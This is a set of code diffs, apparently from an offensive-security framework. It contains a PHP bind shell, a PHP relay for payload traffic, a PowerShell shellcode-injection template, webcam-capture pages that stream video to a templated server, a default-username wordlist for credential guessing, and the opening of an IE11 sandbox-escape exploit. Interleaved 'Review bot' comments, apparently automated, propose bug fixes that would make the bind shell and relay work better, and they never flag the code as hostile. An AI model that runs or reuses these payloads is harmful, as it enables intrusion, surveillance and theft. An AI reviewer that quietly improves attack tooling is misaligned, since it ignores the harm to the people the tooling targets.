@ -9,24 +9,27 @@ if (is_callable('stream_socket_server')) {
|
|||
$srvsock = stream_socket_server("tcp://{$ipaddr}:{$port}");
|
||||
if (!$srvsock) { die(); }
|
||||
$s = stream_socket_accept($srvsock, -1);
|
||||
fclose($srvsock);
|
||||
$s_type = 'stream';
|
||||
} elseif (is_callable('socket_create_listen')) {
|
||||
$srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP);
|
||||
if (!$res) { die(); }
|
||||
$s = socket_accept($srvsock);
|
||||
socket_close($srvsock);
|
||||
$s_type = 'socket';
|
||||
} elseif (is_callable('socket_create')) {
|
||||
$srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
|
||||
$res = socket_bind($srvsock, $ipaddr, $port);
|
||||
if (!$res) { die(); }
|
||||
$s = socket_accept($srvsock);
|
||||
socket_close($srvsock);
|
||||
$s_type = 'socket';
|
||||
} else {
|
||||
die();
|
||||
}
|
||||
if (!$s) { die(); }
|
||||
|
||||
switch ($s_type) {
|
||||
switch ($s_type) {
|
||||
case 'stream': $len = fread($s, 4); break;
|
||||
case 'socket': $len = socket_read($s, 4); break;
|
||||
}
|
||||
|
@ -40,7 +43,7 @@ $len = $a['len'];
|
|||
|
||||
$b = '';
|
||||
while (strlen($b) < $len) {
|
||||
switch ($s_type) {
|
||||
switch ($s_type) {
|
||||
case 'stream': $b .= fread($s, $len-strlen($b)); break;
|
||||
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
|
||||
}
|
||||
|
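Review bot: In the `socket_create_listen` branch, `$res` is never assigned before `if (!$res) { die(); }`, so that path always exits; the check should test the socket itself, `if (!$srvsock) { die(); }`, as the `stream_socket_server` branch does. The call `socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP)` also does not match that function's `(int $port, int $backlog)` signature, so `socket_create_listen($port)` is presumably what was intended; I cannot tell from the rendered hunk whether these lines are new or pre-existing. The surrounding script continues outside the shown hunks.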
|
|
@ -0,0 +1,68 @@
|
|||
<?php
|
||||
$magic = 'TzGq';
|
||||
$tempdir = sys_get_temp_dir() . "/hop" . $magic;
|
||||
if(!is_dir($tempdir)){
|
||||
mkdir($tempdir); //make sure it's there
|
||||
}
|
||||
|
||||
//get url
|
||||
$url = $_SERVER["QUERY_STRING"];
|
||||
//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
|
||||
|
||||
//Looks for a file with a name or contents prefix, if found, send it and deletes it
|
||||
function findSendDelete($tempdir, $prefix, $one=true){
|
||||
if($dh = opendir($tempdir)){
|
||||
while(($file = readdir($dh)) !== false){
|
||||
if(strpos($file, $prefix) !== 0){
|
||||
continue;
|
||||
}
|
||||
readfile($tempdir."/".$file);
|
||||
unlink($tempdir."/".$file);
|
||||
if($one){
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
//handle control
|
||||
if($url === "/control"){
|
||||
if($_SERVER['REQUEST_METHOD'] === 'POST'){
|
||||
//handle data for payload - save in a "down" file or the "init" file
|
||||
$postdata = file_get_contents("php://input");
|
||||
if(array_key_exists('HTTP_X_INIT', $_SERVER)){
|
||||
$f = fopen($tempdir."/init", "w"); //only one init file
|
||||
}else{
|
||||
$prefix = "down_" . bin2hex($_SERVER['HTTP_X_URLFRAG']);
|
||||
$f = fopen(tempnam($tempdir,$prefix), "w");
|
||||
}
|
||||
fwrite($f, $postdata);
|
||||
fclose($f);
|
||||
}else{
|
||||
findSendDelete($tempdir, "up_", false);
|
||||
}
|
||||
}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
|
||||
//get data
|
||||
$postdata = file_get_contents("php://input");
|
||||
//See if we should send anything down
|
||||
if($postdata === 'RECV'){
|
||||
findSendDelete($tempdir, "down_" . bin2hex($url));
|
||||
$fname = $tempdir . "/up_recv_" . bin2hex($url); //Only keep one RECV poll
|
||||
}else{
|
||||
$fname = tempnam($tempdir, "up_"); //actual data gets its own filename
|
||||
}
|
||||
//find free and write new file
|
||||
$f = fopen($fname, "w");
|
||||
fwrite($f, $magic);
|
||||
//Little-endian pack length and data
|
||||
$urlen = strlen($url);
|
||||
fwrite($f, pack('V', $urlen));
|
||||
fwrite($f, $url);
|
||||
$postdatalen = strlen($postdata);
|
||||
fwrite($f, pack('V', $postdatalen));
|
||||
fwrite($f, $postdata);
|
||||
fclose($f);
|
||||
//Initial query will be a GET and have a 12345 in it
|
||||
}else if(strpos($url, "12345") !== FALSE){
|
||||
readfile($tempdir."/init");
|
||||
}
|
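Review bot: None of the `fopen` calls (`$f = fopen($tempdir."/init", "w");`, `$f = fopen(tempnam($tempdir,$prefix), "w");`, `$f = fopen($fname, "w");`) check for failure before `fwrite`/`fclose`, and `readfile($tempdir."/init")` runs even when no init file has been written yet, so a missing or unwritable temp directory produces PHP warnings in the response body instead of a clean failure. A guard such as `if ($f === false) { exit; }` after each fopen, and `if (is_file($tempdir."/init")) { readfile($tempdir."/init"); }`, would make the failure modes explicit. `$_SERVER['HTTP_X_URLFRAG']` is also read without the `array_key_exists` check that `HTTP_X_INIT` gets two lines above. The comment `//make sure it's there` on `mkdir($tempdir)` would be more useful if it noted that mkdir's default mode leaves this directory, which holds the relayed data, readable by other local users of the shared temp dir.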
|
@ -11,10 +11,10 @@ $%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -n
|
|||
|
||||
%{shellcode}
|
||||
|
||||
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,[Math]::Max($%{var_code}.Length, 0x1000),0x40)
|
||||
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
|
||||
|
||||
for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
|
||||
$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
|
||||
$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
|
||||
}
|
||||
|
||||
$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
|
||||
|
|
|
@ -10,7 +10,7 @@
|
|||
height: 480px;
|
||||
width: 640px;
|
||||
border-radius: 15px;
|
||||
-moz-border-raidus: 15px;
|
||||
-moz-border-radius: 15px;
|
||||
background-color: black;
|
||||
position: absolute;
|
||||
left: 50;
|
||||
|
@ -26,7 +26,7 @@
|
|||
height: 180px;
|
||||
width: 200px;
|
||||
border-radius: 15px;
|
||||
-moz-border-raidus: 15px;
|
||||
-moz-border-radius: 15px;
|
||||
background-color: #9B9B9B;
|
||||
position: absolute;
|
||||
top: 480;
|
||||
|
@ -66,8 +66,9 @@
|
|||
left: 10;
|
||||
}
|
||||
</style>
|
||||
<script src="=WEBRTCAPIJS="> </script>
|
||||
<script>
|
||||
=WEBRTCAPIJS=
|
||||
|
||||
window.onerror = function(e) {
|
||||
document.getElementById("message").innerHTML = "Error: " + e.toString();
|
||||
}
|
||||
|
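Review bot: The unitless CSS values `left: 50;` and `top: 480;` in the absolutely-positioned blocks are invalid (a non-zero length needs a unit) and are dropped by standards-mode parsers, so the layout that the `-moz-border-radius` typo fix is meant to restore still depends on quirks mode; `left: 50px;` and `top: 480px;` are presumably the intended values. The `window.onerror` handler writes `e.toString()` into the page through `innerHTML`; `textContent` would show the same message without interpreting it as markup. The style block and the script both continue outside the shown hunks.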
|
|
@ -2,6 +2,10 @@
|
|||
<head>
|
||||
<title>Video session</title>
|
||||
<style type="text/css">
|
||||
body {
|
||||
background: #fff;
|
||||
}
|
||||
|
||||
div.dot1 {
|
||||
position: absolute;
|
||||
width: 20px;
|
||||
|
@ -84,8 +88,9 @@
|
|||
}
|
||||
</style>
|
||||
|
||||
<script src="api.js"> </script>
|
||||
<script>
|
||||
=WEBRTCAPIJS=
|
||||
|
||||
var channel = '=CHANNEL=';
|
||||
var websocket = new WebSocket('ws://=SERVER=');
|
||||
|
||||
|
@ -136,10 +141,12 @@
|
|||
};
|
||||
|
||||
window.onload = function() {
|
||||
getUserMedia(function(stream) {
|
||||
peer.addStream(stream);
|
||||
peer.startBroadcasting();
|
||||
});
|
||||
setTimeout(function(){
|
||||
getUserMedia(function(stream) {
|
||||
peer.addStream(stream);
|
||||
peer.startBroadcasting();
|
||||
});
|
||||
}, 500);
|
||||
};
|
||||
|
||||
function getUserMedia(callback) {
|
||||
|
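Review bot: The new `setTimeout(function(){ ... }, 500);` wrapper around `getUserMedia` introduces a magic delay with no explanation; a one-line comment stating what the 500 ms is waiting for (presumably the inlined `=WEBRTCAPIJS=` script or the WebSocket connection becoming ready) would keep the next maintainer from removing it. If it is the socket, `websocket.onopen` would be the deterministic hook rather than a fixed timer. The `window.onload` handler is shown in full, but the surrounding script continues outside the hunk.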
|
File diff suppressed because it is too large
File diff suppressed because it is too large
|
@ -0,0 +1,915 @@
|
|||
admin
|
||||
|
||||
root
|
||||
Administrator
|
||||
sysadm
|
||||
tech
|
||||
operator
|
||||
guest
|
||||
security
|
||||
debug
|
||||
manager
|
||||
service
|
||||
!root
|
||||
user
|
||||
netman
|
||||
super
|
||||
diag
|
||||
Cisco
|
||||
Manager
|
||||
DTA
|
||||
apc
|
||||
User
|
||||
Admin
|
||||
cablecom
|
||||
adm
|
||||
wradmin
|
||||
netscreen
|
||||
sa
|
||||
setup
|
||||
cmaker
|
||||
enable
|
||||
MICRO
|
||||
login
|
||||
write
|
||||
monitor
|
||||
netopia
|
||||
op
|
||||
adminview
|
||||
sysadmin
|
||||
echo
|
||||
craft
|
||||
maint
|
||||
comcast
|
||||
CSG
|
||||
readonly
|
||||
manuf
|
||||
cusadmin
|
||||
smc
|
||||
sweex
|
||||
disttech
|
||||
su
|
||||
poll
|
||||
SYSDBA
|
||||
anonymous
|
||||
support
|
||||
recovery
|
||||
USERID
|
||||
eng
|
||||
administrator
|
||||
NETWORK
|
||||
JDE
|
||||
Guest
|
||||
rwa
|
||||
USER
|
||||
test
|
||||
lp
|
||||
ro
|
||||
MAIL
|
||||
ami
|
||||
hsa
|
||||
system
|
||||
MGR
|
||||
ADMINISTRATOR
|
||||
FIELD
|
||||
PBX
|
||||
HELLO
|
||||
hscroot
|
||||
1502
|
||||
superuser
|
||||
netrangr
|
||||
readwrite
|
||||
piranha
|
||||
wlse
|
||||
l3
|
||||
none
|
||||
naadmin
|
||||
public
|
||||
NETOP
|
||||
MANAGER
|
||||
demo
|
||||
D-Link
|
||||
l2
|
||||
rw
|
||||
cgadmin
|
||||
storwatch
|
||||
vcr
|
||||
OPERATOR
|
||||
MDaemon
|
||||
jagadmin
|
||||
enquiry
|
||||
at4400
|
||||
davox
|
||||
PFCUser
|
||||
aaa
|
||||
topicalt
|
||||
admin2
|
||||
1234
|
||||
nms
|
||||
client
|
||||
sys
|
||||
field
|
||||
deskman
|
||||
SYSADM
|
||||
superadmin
|
||||
pmd
|
||||
GEN2
|
||||
ADMN
|
||||
Factory
|
||||
PRODDTA
|
||||
tellabs
|
||||
spcl
|
||||
dadmin
|
||||
helpdesk
|
||||
dhs3mt
|
||||
install
|
||||
adfexc
|
||||
IntraSwitch
|
||||
manage
|
||||
superman
|
||||
SPOOLMAN
|
||||
ADVMAIL
|
||||
vt100
|
||||
PSEAdmin
|
||||
patrol
|
||||
teacher
|
||||
PCUSER
|
||||
Any
|
||||
RSBCMON
|
||||
cellit
|
||||
inads
|
||||
halt
|
||||
locate
|
||||
TMAR#HWMT8007079
|
||||
rapport
|
||||
xbox
|
||||
device
|
||||
NICONEX
|
||||
acc
|
||||
31994
|
||||
bcim
|
||||
websecadm
|
||||
blue
|
||||
topicnorm
|
||||
supervisor
|
||||
ccrusr
|
||||
266344
|
||||
telecom
|
||||
GEN1
|
||||
SSA
|
||||
HTTP
|
||||
mtch
|
||||
bciim
|
||||
browse
|
||||
hydrasna
|
||||
deskres
|
||||
bbsd-client
|
||||
replicator
|
||||
intel
|
||||
radware
|
||||
intermec
|
||||
mlusr
|
||||
init
|
||||
e250
|
||||
Polycom
|
||||
temp1
|
||||
mac
|
||||
3comcso
|
||||
RMUser1
|
||||
WP
|
||||
NAU
|
||||
rcust
|
||||
mtcl
|
||||
topicres
|
||||
bcnas
|
||||
adminuser
|
||||
Root
|
||||
cac_admin
|
||||
mediator
|
||||
Anonymous
|
||||
kermit
|
||||
volition
|
||||
GlobalAdmin
|
||||
LUCENT01
|
||||
LUCENT02
|
||||
adminstat
|
||||
desknorm
|
||||
IntraStack
|
||||
e500
|
||||
deskalt
|
||||
cust
|
||||
tiara
|
||||
bcms
|
||||
m1122
|
||||
telco
|
||||
xd
|
||||
dhs3pms
|
||||
VNC
|
||||
customer
|
||||
cisco
|
||||
adminstrator
|
||||
ftp_nmc
|
||||
me
|
||||
iclock
|
||||
scmadmin
|
||||
installer
|
||||
webadmin
|
||||
ftp_inst
|
||||
DDIC
|
||||
SYSTEM
|
||||
draytek
|
||||
EARLYWATCH
|
||||
super.super
|
||||
ftp_oper
|
||||
corecess
|
||||
weblogic
|
||||
system/manager
|
||||
End
|
||||
d.e.b.u.g
|
||||
target
|
||||
MD110
|
||||
tiger
|
||||
adminttd
|
||||
wlseuser
|
||||
SAPCPIC
|
||||
ftp_admi
|
||||
default.password
|
||||
7
|
||||
2
|
||||
ADMIN
|
||||
itsadmin
|
||||
PUBSUB
|
||||
CTXSYS
|
||||
ftp
|
||||
bill
|
||||
192.168.1.1
|
||||
setpriv
|
||||
GUEST
|
||||
SAP*
|
||||
t3admin
|
||||
hello
|
||||
CISCO15
|
||||
1.79
|
||||
mso
|
||||
Telecom
|
||||
qsysopr
|
||||
APPS
|
||||
Developer
|
||||
mail
|
||||
qsecofr
|
||||
11111
|
||||
Service
|
||||
netadmin
|
||||
any
|
||||
db2fenc1
|
||||
johnson
|
||||
isp
|
||||
demos
|
||||
QSRV
|
||||
MDSYS
|
||||
vpasp
|
||||
TEST
|
||||
QSECOFR
|
||||
1
|
||||
informix
|
||||
5
|
||||
engmode
|
||||
scout
|
||||
qpgmr
|
||||
ADSL
|
||||
images
|
||||
Gearguy
|
||||
Demo
|
||||
serial#
|
||||
BACKUP
|
||||
stratacom
|
||||
6.x
|
||||
mary
|
||||
COMPANY
|
||||
SYS
|
||||
DSL
|
||||
Jetform
|
||||
eagle
|
||||
ROUTER
|
||||
ods
|
||||
siteadmin
|
||||
Alphanetworks
|
||||
Admin1
|
||||
janta
|
||||
servlet
|
||||
username
|
||||
citel
|
||||
Replicator
|
||||
SYSMAN
|
||||
master
|
||||
SUPERUSER
|
||||
cn=orcladmin
|
||||
30
|
||||
maintainer
|
||||
BRIO_ADMIN
|
||||
internal
|
||||
CQSCHEMAUSER
|
||||
DEV2000_DEMOS
|
||||
FSFTASK1
|
||||
checkfs
|
||||
USER1
|
||||
SQLDBA
|
||||
HELP
|
||||
toor
|
||||
qsrvbas
|
||||
SYSADMIN
|
||||
EZsetup
|
||||
BATCH
|
||||
STRAT_USER
|
||||
primenet
|
||||
OEMREP
|
||||
USER6
|
||||
lynx
|
||||
powerdown
|
||||
$ALOC$
|
||||
password
|
||||
VOL-0215
|
||||
tomcat
|
||||
REP_MANAGER
|
||||
WinCCConnect
|
||||
ALLIN1
|
||||
DIRMAINT
|
||||
eqadmin
|
||||
QSRVBAS
|
||||
AQJAVA
|
||||
LASERWRITER
|
||||
PERFSTAT
|
||||
apcuser
|
||||
MBWATCH
|
||||
system_admin
|
||||
unix
|
||||
OWNER
|
||||
NETPRIV
|
||||
VSEMAINT
|
||||
DEMO
|
||||
SYMPA
|
||||
REP_OWNER
|
||||
DCL
|
||||
FAX
|
||||
ARCHIVIST
|
||||
VTAMUSER
|
||||
VMTAPE
|
||||
basisk
|
||||
NetLinx
|
||||
OutOfBox
|
||||
NETMGR
|
||||
DEFAULT
|
||||
OAS_PUBLIC
|
||||
read
|
||||
AP
|
||||
MTSSYS
|
||||
SYSMAINT
|
||||
AUDIOUSER
|
||||
Joe
|
||||
IDMS
|
||||
$SRV
|
||||
snake
|
||||
ROOT
|
||||
PRINTER
|
||||
shutdown
|
||||
satan
|
||||
RDM470
|
||||
trouble
|
||||
fax
|
||||
OP1
|
||||
admin@example.com
|
||||
HOST
|
||||
ADLDEMO
|
||||
QS_ADM
|
||||
bin
|
||||
OPER
|
||||
oracle
|
||||
jj
|
||||
PO7
|
||||
www
|
||||
joe
|
||||
MAINT
|
||||
CMSBATCH
|
||||
CCC
|
||||
role1
|
||||
DATAMOVE
|
||||
MSHOME
|
||||
ISPVM
|
||||
crowd-openid-server
|
||||
user_editor
|
||||
sedacm
|
||||
db2admin
|
||||
Airaya
|
||||
SYSDUMP1
|
||||
IMEDIA
|
||||
primos_cs
|
||||
USER_TEMPLATE
|
||||
pnadmin
|
||||
lpadmin
|
||||
VTAM
|
||||
TRACESVR
|
||||
POSTMASTER
|
||||
MAILER
|
||||
RSCSV2
|
||||
QS_WS
|
||||
circ
|
||||
nobody
|
||||
Tasman
|
||||
DISCOVERER_ADMIN
|
||||
VMASMON
|
||||
LR-ISDN
|
||||
TURBINE
|
||||
GL
|
||||
PO
|
||||
PRINT
|
||||
MODTEST
|
||||
GATEWAY
|
||||
PRIMARY
|
||||
both
|
||||
haasadm
|
||||
pw
|
||||
games
|
||||
DOCSIS_APP
|
||||
bbs
|
||||
EMP
|
||||
postmaster
|
||||
SITEMINDER
|
||||
vgnadmin
|
||||
RJE
|
||||
gonzo
|
||||
NEWS
|
||||
AQUSER
|
||||
UTLBSTATU
|
||||
netbotz
|
||||
xmi_demo
|
||||
ORACACHE
|
||||
MCUser
|
||||
prash
|
||||
sync
|
||||
PM
|
||||
AP2SVP
|
||||
ibm
|
||||
ULTIMATE
|
||||
SABRE
|
||||
user_pricer
|
||||
SUPERVISOR
|
||||
EVENT
|
||||
PORTAL30_SSO_PS
|
||||
FSFADMIN
|
||||
OO
|
||||
WKSYS
|
||||
OPERATNS
|
||||
UVPIM_
|
||||
OE
|
||||
OCITEST
|
||||
web
|
||||
ESSEX
|
||||
None
|
||||
CTXDEMO
|
||||
user_designer
|
||||
QDBA
|
||||
role
|
||||
LRISDN
|
||||
tele
|
||||
WEBCAL01
|
||||
rsadmin
|
||||
OMWB_EMULATION
|
||||
WINDOWS_PASSTHRU
|
||||
MOREAU
|
||||
fast
|
||||
host
|
||||
ORDPLUGINS
|
||||
SYSWRM
|
||||
savelogs
|
||||
SDOS_ICSAP
|
||||
DSSYS
|
||||
MGWUSER
|
||||
TDOS_ICSAP
|
||||
ssp
|
||||
EJSADMIN
|
||||
INGRES
|
||||
DS
|
||||
estheralastruey
|
||||
VCSRV
|
||||
ssladmin
|
||||
CLARK
|
||||
OEMADM
|
||||
restoreonly
|
||||
quser
|
||||
MILLER
|
||||
trmcnfg
|
||||
REPORT
|
||||
user_author
|
||||
dpn
|
||||
tour
|
||||
mountfsys
|
||||
http
|
||||
PROG
|
||||
openfiler
|
||||
RAID
|
||||
STARTER
|
||||
FAXUSER
|
||||
DSA
|
||||
daemon
|
||||
mountsys
|
||||
backuponly
|
||||
IVPM1
|
||||
USER3
|
||||
OPENSPIRIT
|
||||
prime
|
||||
HPLASER
|
||||
CSPUSER
|
||||
qsvr
|
||||
SYSCKP
|
||||
Sysop
|
||||
user_marketer
|
||||
IMAGEUSER
|
||||
bsxuser
|
||||
MASTER
|
||||
USER9
|
||||
OLAPSYS
|
||||
rje
|
||||
ODM_MTR
|
||||
QS_ES
|
||||
lansweeperuser
|
||||
DEMO3
|
||||
Username
|
||||
GPLD
|
||||
uucp
|
||||
DBSNMP
|
||||
VMARCH
|
||||
SWUSER
|
||||
Operator
|
||||
CHEY_ARCHSVR
|
||||
roo
|
||||
n.a
|
||||
accounting
|
||||
backuprestore
|
||||
dni
|
||||
WEBADM
|
||||
iceman
|
||||
guru
|
||||
anon
|
||||
USER8
|
||||
PORTAL30_SSO_PUBLIC
|
||||
postgres
|
||||
WINSABRE
|
||||
USERP
|
||||
IVPM2
|
||||
PORTAL30_SSO
|
||||
ALLIN1MAIL
|
||||
POST
|
||||
TEMP
|
||||
BATCH1
|
||||
PROMAIL
|
||||
SECDEMO
|
||||
ARAdmin
|
||||
sadmin
|
||||
ORAREGSYS
|
||||
VMASSYS
|
||||
man
|
||||
FROSTY
|
||||
LASER
|
||||
tutor
|
||||
DISKCNT
|
||||
default
|
||||
SYSERR
|
||||
WWW
|
||||
VAX
|
||||
PROCAL
|
||||
FAXWORKS
|
||||
LDAP_Anonymous
|
||||
(any
|
||||
setup/snmp
|
||||
DSGATEWAY
|
||||
AWARD_SW
|
||||
CSMIG
|
||||
umountfsys
|
||||
VMS
|
||||
bpel
|
||||
viewuser
|
||||
TDISK
|
||||
politically
|
||||
user_analyst
|
||||
RSCS
|
||||
COMPIERE
|
||||
OSP22
|
||||
guest1
|
||||
FORSE
|
||||
factory
|
||||
bubba
|
||||
QUSER
|
||||
primeos
|
||||
glftpd
|
||||
RMAN
|
||||
mountfs
|
||||
DIRECT
|
||||
firstsite
|
||||
IPFSERV
|
||||
TSUSER
|
||||
BATCH2
|
||||
snmp
|
||||
WebAdmin
|
||||
IBMUSER
|
||||
SMART
|
||||
voadmin
|
||||
BC4J
|
||||
core
|
||||
OPERVAX
|
||||
Bobo
|
||||
WANGTEK
|
||||
OWA
|
||||
USER2
|
||||
jasperadmin
|
||||
VMBSYSAD
|
||||
PVM
|
||||
ctb_admin
|
||||
|
||||
DEMO4
|
||||
qsrv
|
||||
superdba
|
||||
PORTAL30
|
||||
XPRT
|
||||
Crowd
|
||||
18364
|
||||
ilom-admin
|
||||
rdc123
|
||||
sysopr
|
||||
tasman
|
||||
blank
|
||||
WEBREAD
|
||||
ODM
|
||||
11111111
|
||||
AURORA$ORB$UNAUTHENTICATED
|
||||
ADAMS
|
||||
Craft
|
||||
rfmngr
|
||||
SYSTEST_CLIG
|
||||
user_approver
|
||||
ilom-operator
|
||||
Nice-admin
|
||||
answer
|
||||
NETNONPRIV
|
||||
nuucp
|
||||
CIDS
|
||||
VASTEST
|
||||
redline
|
||||
MBMANAGER
|
||||
webmaster
|
||||
APPLSYS
|
||||
USER4
|
||||
hqadmin
|
||||
UOMNI_
|
||||
VMUTIL
|
||||
uucpadm
|
||||
EXFSYS
|
||||
4Dgifts
|
||||
JMUSER
|
||||
CIS
|
||||
UNITY_
|
||||
HLW
|
||||
pwrchute
|
||||
IDMSSE
|
||||
NSA
|
||||
TELEDEMO
|
||||
recover
|
||||
TRAVEL
|
||||
lexar
|
||||
viewer
|
||||
LIBRARY
|
||||
PO8
|
||||
root@localhost
|
||||
NAMES
|
||||
secofr
|
||||
PDMREMI
|
||||
MGE
|
||||
USER7
|
||||
OWA_PUBLIC
|
||||
questra
|
||||
builtin
|
||||
SFCNTRL
|
||||
boss
|
||||
PLEX
|
||||
OLAPDBA
|
||||
OLAPSVR
|
||||
user_expert
|
||||
Bhosda
|
||||
gropher
|
||||
TAHITI
|
||||
NEWINGRES
|
||||
VM3812
|
||||
VIF_DEVELOPER
|
||||
joeuser
|
||||
IPC
|
||||
HELPDESK
|
||||
wlpisystem
|
||||
TSAFVM
|
||||
prtgadmin
|
||||
UAMIS_
|
||||
theman
|
||||
CISINFO
|
||||
mobile
|
||||
QS_CB
|
||||
CDEMORID
|
||||
DEMO2
|
||||
PORTAL30_PUBLIC
|
||||
MDDEMO_CLERK
|
||||
PHANTOM
|
||||
ODS
|
||||
BLAKE
|
||||
TSDEV
|
||||
PRODBM
|
||||
dos
|
||||
APL2PP
|
||||
god1
|
||||
CICSUSER
|
||||
22222222
|
||||
user_publisher
|
||||
OSE$HTTP$ADMIN
|
||||
def
|
||||
SuperUser
|
||||
QS_CBADM
|
||||
SYSA
|
||||
STUDENT
|
||||
Draytek
|
||||
SMDR
|
||||
EREP
|
||||
VSEMAN
|
||||
fwadmin
|
||||
MTS_USER
|
||||
AQDEMO
|
||||
private
|
||||
IS_$hostname
|
||||
HPSupport
|
||||
ORASSO
|
||||
CVIEW
|
||||
SH
|
||||
XXSESS_MGRYY
|
||||
VMMAP
|
||||
PORTAL30_DEMO
|
||||
Ezsetup
|
||||
QS_CS
|
||||
CMSUSER
|
||||
DEMO1
|
||||
userNotUsed
|
||||
ncadmin
|
||||
TESTPILOT
|
||||
fg_sysadmin
|
||||
UETP
|
||||
QS
|
||||
DBI
|
||||
JWARD
|
||||
APPS_MRC
|
||||
Moe
|
||||
SENTINEL
|
||||
Yak
|
||||
PDP11
|
||||
Flo
|
||||
SLIDE
|
||||
INFO
|
||||
checkfsys
|
||||
PRODCICS
|
||||
MXAGENT
|
||||
VMTLIBR
|
||||
POWERCARTUSER
|
||||
VMBACKUP
|
||||
CPNUC
|
||||
distrib
|
||||
MIGRATE
|
||||
CDEMOUCB
|
||||
OLTSEP
|
||||
sysbin
|
||||
signa
|
||||
autocad
|
||||
WEBDB
|
||||
ncrm
|
||||
SAMPLE
|
||||
HCPARK
|
||||
ALLINONE
|
||||
nm2user
|
||||
SAVSYS
|
||||
IIPS
|
||||
PATROL
|
||||
mailadmin
|
||||
TMSADM
|
||||
ESubscriber
|
||||
software
|
||||
god2
|
||||
FSFTASK2
|
||||
ORDSYS
|
||||
gopher
|
||||
PSFMAINT
|
||||
EAdmin
|
||||
12345
|
||||
DECNET
|
||||
OPERATIONS
|
||||
$system
|
||||
PANAMA
|
||||
LIBRARIAN
|
||||
fal
|
||||
NETSERVER
|
||||
POWERCHUTE
|
||||
USER5
|
||||
GPFD
|
||||
QS_OS
|
||||
REPADMIN
|
||||
0
|
||||
DEMO8
|
||||
DEMO9
|
||||
CDEMO82
|
||||
umountsys
|
||||
USER0
|
||||
CDEMOCOR
|
||||
SYSTEST
|
||||
Rodopi
|
||||
user_checker
|
||||
qserv
|
||||
AQ
|
||||
SAPR3
|
||||
VRR1
|
||||
fastwire
|
||||
admi
|
||||
FINANCE
|
||||
WinCCAdmin
|
||||
ESTOREUSER
|
||||
VIRUSER
|
||||
LINK
|
||||
APPLSYSPUB
|
||||
overseer
|
||||
checksys
|
||||
umountfs
|
||||
DBDCCICS
|
||||
TOAD
|
||||
ntpupdate
|
||||
MDDEMO_MGR
|
||||
billy-bob
|
||||
DECMAIL
|
||||
alien
|
||||
nsroot
|
||||
AdvWebadmin
|
||||
dvstation
|
||||
SERVICECONSUMER1
|
||||
MMO2
|
||||
NOC
|
||||
WWWUSER
|
||||
SAP
|
||||
NEVIEW
|
||||
ODSCOMMON
|
||||
pixadmin
|
||||
ripeop
|
||||
PENG
|
||||
netlink
|
||||
L2LDEMO
|
||||
OUTLN
|
||||
12.x
|
||||
scott
|
||||
dbase
|
||||
fam
|
||||
Oper
|
||||
RMAIL
|
||||
FND
|
||||
PRIV
|
||||
SETUP
|
||||
news
|
||||
VSEIPO
|
||||
ilon
|
||||
PLSQL
|
||||
politcally
|
||||
18140815
|
||||
APPUSER
|
||||
CENTRA
|
||||
LBACSYS
|
||||
PDP8
|
||||
SFCMI
|
||||
lpadm
|
||||
Test
|
||||
bewan
|
||||
DIP
|
||||
mfd
|
||||
MDDEMO
|
||||
SWPRO
|
||||
DES
|
||||
Coco
|
||||
GCS
|
||||
rodopi
|
||||
Scott
|
||||
Admin5
|
||||
ANDY
|
||||
DESQUETOP
|
||||
NETCON
|
||||
JONES
|
||||
author
|
||||
MOESERV
|
||||
PUBSUB1
|
||||
CATALOG
|
||||
SQLUSER
|
||||
RE
|
||||
REPORTS_USER
|
||||
MFG
|
||||
HR
|
||||
VIDEOUSER
|
||||
DBA
|
||||
AUTOLOG1
|
||||
AURORA$JIS$UTILITY$
|
||||
wlcsystem
|
||||
CPRM
|
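--- a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp
@@ -0,0 +1,184 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+#include <winternl.h>
+#include <IEPMapi.h>
+
+#define MAX_ENV 32767
+
+#pragma comment(lib, "Iepmapi.lib")
+
+typedef NTSTATUS (__stdcall *fNtOpenSection)(
+_Out_ PHANDLE SectionHandle,
+_In_ ACCESS_MASK DesiredAccess,
+_In_ POBJECT_ATTRIBUTES ObjectAttributes
+);
+
+HANDLE MyCreateProcess(bstr_t exec, bstr_t cmdline)
+{
+STARTUPINFO startInfo = { 0 };
+PROCESS_INFORMATION procInfo = { 0 };
+
+if (!CreateProcess(exec, cmdline, NULL, NULL, FALSE, 0, NULL, NULL,
+&startInfo, &procInfo))
+{
+DebugPrintf("Error Creating Process: %d", GetLastError());
+
+return nullptr;
+}
+else
+{
+CloseHandle(procInfo.hThread);
+
+return procInfo.hProcess;
+}
+}
+
+bstr_t GetExploitUrl(LPWSTR env)
+{
+WCHAR buf[MAX_ENV];
+
+GetEnvironmentVariable(env, buf, MAX_ENV);
+
+return buf;
+}
+
+void CreateIEProcess()
+{
+HANDLE hProcess = MyCreateProcess(GetExecutableFileName(nullptr), L"iexplore.exe " + GetExploitUrl(L"HTML_URL"));
+
+if (hProcess)
+{
+WaitForSingleObject(hProcess, 1000);
+CloseHandle(hProcess);
+}
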